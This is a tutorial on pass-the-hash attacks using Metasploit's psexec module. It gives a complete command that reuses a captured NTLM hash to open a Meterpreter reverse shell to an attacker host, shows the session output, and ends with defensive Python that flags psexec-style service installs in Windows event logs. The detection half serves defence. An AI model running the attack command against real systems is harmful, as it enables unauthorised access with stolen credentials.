
Pass the Hash Attack with Metasploit

Windows systems usually store the NTLM hash right alongside the LM hash, the NTLM hash being the more secure of the two. When a system is compromised with Administrator or SYSTEM level access, an attacker will often take a copy of the password hashes for off-line cracking. But what if the passwords that were chosen are very strong and cannot be cracked in a realistic time-frame?

Sometimes we do not need to crack them at all. We can take the hash as-is and use it as a token to authenticate to the system. This technique is called "Pass the Hash". The same password hashes can be used to authenticate either to the previously compromised system or to any other system that shares the same password.

For example:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:7d3f11711c610f013c06959a5e98f2fd:::

Having found that the NTLM hash is not crackable in a reasonable time, whether by brute force or rainbow tables, we might abandon cracking as unfeasible. However, we can reuse the password hash "as is" to re-authenticate to the Windows system over SMB. Metasploit has a handy module, "exploit/windows/smb/psexec", which authenticates over SMB, uploads a payload and runs it as a service. In the following example we use Meterpreter as the payload:

/pentest/exploits/framework3/msfcli exploit/windows/smb/psexec PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.32 LPORT=443 RHOST=192.168.1.20 SMBUser=Administrator SMBPass=aad3b435b51404eeaad3b435b51404ee:7d3f11711c610f013c06959a5e98f2fd E


[*] Please wait while we load the module tree...
[*] Started reverse handler on 192.168.1.32:443
[*] Connecting to the server...
[*] Authenticating as user 'Administrator'...
[*] Uploading payload...
[*] Created \CpdYVAFa.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.20[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.20[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (eHIqItmA - "MhEHHIQNUFjnuuJarbnQlnIjpA")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Sending stage (748544 bytes) to 192.168.1.20
[*] Closing service handle...
[*] Deleting \CpdYVAFa.exe...
[*] Meterpreter session 1 opened (192.168.1.32:443 -> 192.168.1.20:1090)


meterpreter >

This attack works against any system that has an account with the same password and port 445 open. You can watch the video tutorial below:
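The module output above shows what this technique leaves behind on the target: a service with a random name and display name, created and removed within seconds, whose binary is a random .exe dropped into the Windows directory over the ADMIN$ share. Each such install is logged as System Event ID 7045. The following is an added example, not part of the original post or of Metasploit, that scores constructed 7045 records against those traits; the sample records and the 0.35 upper-case ratio are assumptions chosen for illustration.

```python
import re
# Constructed sample of Windows System-log "A service was installed" records
# (Event ID 7045) flattened to key=value lines. The first mirrors the psexec run
# on this page; the others are ordinary installs. Not real captured logs.
SAMPLE_7045 = [
    'EventID=7045 ServiceName=eHIqItmA DisplayName=MhEHHIQNUFjnuuJarbnQlnIjpA '
    'ImagePath=%SYSTEMROOT%\\CpdYVAFa.exe StartType="demand start" Account=LocalSystem',
    'EventID=7045 ServiceName=Spooler DisplayName="Print Spooler" '
    'ImagePath=%SystemRoot%\\System32\\spoolsv.exe StartType="auto start" Account=LocalSystem',
    'EventID=7045 ServiceName=gupdate DisplayName="Google Update Service (gupdate)" '
    'ImagePath="C:\\Program Files\\Google\\Update\\GoogleUpdate.exe" StartType="auto start"',
]
FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

def parse_7045(line):
    """Turn one flattened 7045 record into a dict of field -> value."""
    return {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
            for m in FIELD_RE.finditer(line)}

def looks_random(name):
    """Heuristic for generated names: letters only, 8+ chars, drawn from both
    cases, so about half upper-case with frequent case flips (assumed cutoffs)."""
    if len(name) < 8 or not name.isalpha():
        return False
    upper = sum(c.isupper() for c in name)
    flips = sum(a.isupper() != b.isupper() for a, b in zip(name, name[1:]))
    return 0 < upper < len(name) and upper / len(name) >= 0.35 and flips >= 3

def score_7045(rec):
    """Reasons a 7045 record resembles a psexec-style throwaway service."""
    reasons = []
    if looks_random(rec.get("ServiceName", "")):
        reasons.append("random-looking service name")
    if looks_random(rec.get("DisplayName", "")):
        reasons.append("random-looking display name")
    path = rec.get("ImagePath", "")
    stem, _, ext = path.rsplit("\\", 1)[-1].rpartition(".")
    if ext.lower() == "exe" and looks_random(stem):
        reasons.append("random-looking binary name")
    if re.fullmatch(r"%systemroot%\\[^\\]+", path, re.IGNORECASE):
        reasons.append("binary dropped straight into the Windows directory (ADMIN$ root)")
    return reasons

def flag_suspicious(lines):
    """Return [(service name, reasons)] for records with two or more indicators."""
    hits = []
    for rec in map(parse_7045, lines):
        reasons = score_7045(rec)
        if len(reasons) >= 2:
            hits.append((rec.get("ServiceName"), reasons))
    return hits
```

Correlating a flagged 7045 with a preceding type-3 logon (Event ID 4624, NTLM) from the same source address, followed shortly by the service's removal, makes the pattern much harder to confuse with a legitimate install.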

